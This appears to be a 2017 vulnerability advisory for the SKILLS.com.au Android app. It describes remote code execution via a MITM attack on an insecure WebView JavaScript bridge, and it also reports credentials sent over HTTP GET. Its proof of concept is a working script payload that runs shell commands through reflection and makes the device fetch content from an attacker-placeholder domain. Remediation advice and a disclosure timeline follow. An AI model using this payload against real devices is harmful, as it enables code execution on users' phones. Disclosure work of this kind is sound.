Home / os / winmobile

SKILLS.com.au Industry App 1.0 Man-In-The-Middle / Code Execution

Posted on 22 July 2017

# Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM # Date: 20/Jul/17 # Exploit Author: MaXe # Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP] # Software Link: N/A # Screenshot: N/A # Version: 1.0 # Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86 # CVE : N/A SKILLS.com.au Industry App - Remote Code Execution via MITM Version affected: 1.0 App Info: The Android application reviewed is used to log into the skills.com.au website. External Links: https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP] Credits: MaXe (@InterN0T) Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did: https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb] Reference: "String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");" Shouts: SubHacker and the rest of the awesome infosec community. -:: The Advisory ::- The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks. This is caused by the following lines of code within the a3skillscommain.java: (Lines 442 - 448) StringUtils stringUtils = new StringUtils(); String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8"); WebViewExtras webViewExtras = mostCurrent._webviewextras1; WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A"); mostCurrent._webview1.LoadUrl(str2); mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000); mostCurrent._t.setEnabled(true); In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml) <uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" /> If an attacker performs a MITM attack against "www.skills.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.skills.com.au", then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute in the context of the application. The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript. -:: Proof of Concept ::- A successful attack that makes "www.skills.com.au" serve the following code: <script> function execute(cmd){ return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd); } execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a3.skills.com/owned']); execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']); </script> This application has been owned. Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example. Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below. The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials. -:: Solution ::- The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used: WebView webView = new WebView(this); setContentView(webView); ... Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows: <manifest> <uses-sdk android:minSdkVersion="17" /> ... </manifest> The URL used ("http://www.skills.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly). Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not: private void exposeJsInterface() { if (VERSION.SDK_INT < 17) { Log.i(TAG, "addJavascriptInterface() bridge disabled."); } else { addJavascriptInterface(Object, "EVENT_NAME_HERE"); } } In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented: - All URLS within the application must utilize HTTPS. - Certificate pinning should also be implemented. - Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead. References: http://50.56.33.56/blog/?p=314 https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String) https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/ https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/ https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614 Filename: a3.skills.com_manual.apk File size: 332,914 bytes md5: d1022a25893ec8549234d20fa55c13f8 sha1: 96f85493332e9b2a2efecc4acdca75f84c13809d sha256: e1724043dbca70a76a33598d3483fba51ae171ed0d05a4e5cacab103c1c2a21c App Name: SKILLS.com.au Industry App Package Name: a3.skills.com Package Version: 1.0 Disclosure Timeline: - 20Jul17: Vendor is informed about advisories. - 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28 - 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam - 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y - 20Jul17: Advisory released to the public. === EOF ===

 

TOP